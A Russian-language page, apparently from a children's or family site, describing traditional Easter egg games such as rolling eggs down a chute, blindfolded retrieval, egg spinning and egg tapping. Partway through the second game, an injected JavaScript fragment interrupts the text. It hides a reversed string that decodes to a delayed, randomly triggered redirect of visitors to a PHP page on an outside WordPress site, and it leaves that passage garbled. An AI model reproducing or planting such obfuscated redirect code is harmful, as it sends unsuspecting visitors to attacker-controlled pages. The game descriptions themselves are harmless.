Дорогие дети и их родители! Предлагаем Вам сыграть в традиционные пасхальные игры
Дорогие дети и их родители! Предлагаем Вам сыграть в традиционные пасхальные игры:
- Скатывание яиц с деревянного лотка. Как играем:
Берем желоб. Раньше такой желоб делали из дерева. Длина его должна быть 1 метр и более, ширина примерно 20 см, края высотой 3-5 см. Один конец желоба поднят над землей / над полом на 20 см. Подставкой для желоба может быть пень, бревно, кирпич, опрокинутый таз или ведро или маленький стульчик, или коробка из-под обуви в домашних условиях.Можно легко заменить деревянный желоб плотным картоном, вырезав из него длинную полосу нужного размера, и сложив ее буквой п, чтобы получилась «труба – горка».
- Расставляем на столе рядом с нашей горкой яйца всех участников игры (каждый игрок выставляет по 1 яйцу). Расставляем яйца так, чтобы скатываясь с горки и прокатываясь по столу, яйцо игрока могло сбить яйца участников игры или прокатиться мимо их (вспомним современную игру в кегли).
- Каждый участник отправляет свое яйцо вниз с нашей горки (это делается по очереди). Игрок, отправляющий яйцо, должен рассчитать так, чтобы яйцом сбить с места одно из расставленных на столе яиц других участников игры.
- Если мальчику удалось сбить яйцо, он забирает себе сбитое яйцо и продолжает игру – снова запускает свое яйцо с горки. Если же ему не удалось сбить яйцо, то он уступает ход следующему игроку. Яйцо, которое скатилось и не сбило других яиц остается в игре.
- Побеждает тот, кто набрал больше всех яиц в этой игре. Следующая игра.
На землю (на пол, на стол, на стул) кладут яйцо.
- ) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom_class=»]
Одному участнику завязывают глаза и отводят его подальше от места, где лежит яйцо.
- Участник с завязанными глазами идет к яйцу. Идет до того места, пока сам не решит, что уже подошёл к яйцу (ему никто не подсказывает и никто ее не останавливает).
- Дойдя до нужного места (как он считает), он останавливается и снимает повязку.
- Теперь ему надо достать это яйцо и взять его в руки. Если участник подошёл к нужному месту, то задача эта решится просто. А если далеко? Придется проявить изобретательность чтобы достать яйцо!
Если участнику удалось достать яйцо, он забирает его себе.
Ещё одна игра
- Поставьте в ряд крашеные яйца на расстоянии примерно 8-10 см друг от друга.
- Отойдите на 10, а лучше на 20 шагов от них.
- Возьмите небольшой мягкий мяч (лоскутный, войлочный, резиновый, кожаный) и покатите его или бросьте. Если мяч задел яйцо, Вы выиграли и забираете это яйцо себе, при Вас остается и Ваше яйцо. Далее Вы делаете следующий ход.
- Если Ваш мяч не задел ни одного яйца, то Вы передаете ход другому игроку. А Ваше яйцо остается в общей игре.
- Задача – собрать как можно больше яиц.
Еще одна игра
В эту игру играть можно как вдвоем, так и большой группой. Все игроки одновременно закручивают свои яйца. Чье яйцо дольше прокрутилось – тот и победитель. Он забирает яйцо проигравшего.
Но чтобы твое яйцо крутилось долго – нужно еще и сообразить, как лучше его закручивать – ставить яйцо горизонтально или вертикально, как держать руку и т.д. Изобретайте! Этот способ находится путем проб и ошибок, но он есть!
«На попА»
Игра, аналогичная предыдущей, но задача в ней совсем другая. Нужно раскрутить свое яйцо так, чтобы оно встало «на попа», то есть вертикально! Кому это удалось, тот и победил и забирает яйца проигравших. Вот еще один способ развития смекалки в игре. Вы догадались, как закручивать яйцо так, чтобы оно встало на «попа»? Нет? Тогда за дело! Начинайте пробовать! И обязательно найдете этот способ.
Воротца
- Сделайте воротца. Для этого поставьте два стакана или других предметана расстоянии примерно 8 см. Чем меньше возраст детей, тем шире нужно сделать воротца.
- Недалеко от наших ворот установите желоб (примерное расстояние от конца желоба до ворот — один шаг).
- Игрок берет свое яйцо и прокатывает его по желобку. Задача – яйцо должно пройти сквозь воротца.
Еще одна игра
Игра в паре. Каждый игрок встает у стены комнаты. Один говорит: «Христос Воскресе!». Второй ему отвечает: «Воистину воскресе!». После этого игроки катят яйца по полу навстречу друг другу. Задача – чтобы яйца встретились и столкнулись. У кого яйцо при этом разбилось – отдает ему выигравшему.
Ну и последняя.
1.Берем три — четыре шапки, или коробки или тарелочки.
2.Один игрок(водящий) выходит из комнаты.
3.В это время играющие прячут яйца под тарелочками (шапками) в любом порядке и количестве. Можно одну (или две) тарелочку оставлять пустой.
4.Зовут водящего-он должен выбрать себе тарелочку- какую выберет- те и яйца забирает себе.
5.Задача-набрать побольше яиц.
Ну и всем известная
- Два игрока встают лицом друг к другу. Каждый зажимает в кулаке яйцо так, чтобы был виден либо его «носок», либо «пятка». Носком называется острый конец яйца, а пяткой – тупой конец.
- Они ударяют яйца и смотрят, у кого яйцо осталось целым. Победитель, у которого яйцо осталось целым, забирает себе и разбитое яйцо.
Вариант этой игры для нескольких человек.
- Играющие выбирают по считалке «забойщицу», у которой в руках будет ее яйцо – «забивало».
- Забойщица со своим яйцом – забивалой обходит всех участников игры и стучит своим яйцом по яйцу игрока (яйцо игроками также держится в кулаке так, чтобы была видна либо пятка, либо носок яйца).
- Забойщица обходит всех до тех пор, пока ее забивало не разобьется с двух сторон. Тогда все открывают ладоши и показывают свои яйца. Все разбитые яйца складываем в корзинку. А выиграют те участники , у которых яйца остаются целыми. Они забирают себе разбитые яйца.
Раньше верили, что человек, выигравший в игре крашеное яйцо, обеспечивает себе этим здоровье и богатство на целый год вперед. Давайте возрождать пасхальные традиции в наших семьях! И поиграем друг с другом и с детьми!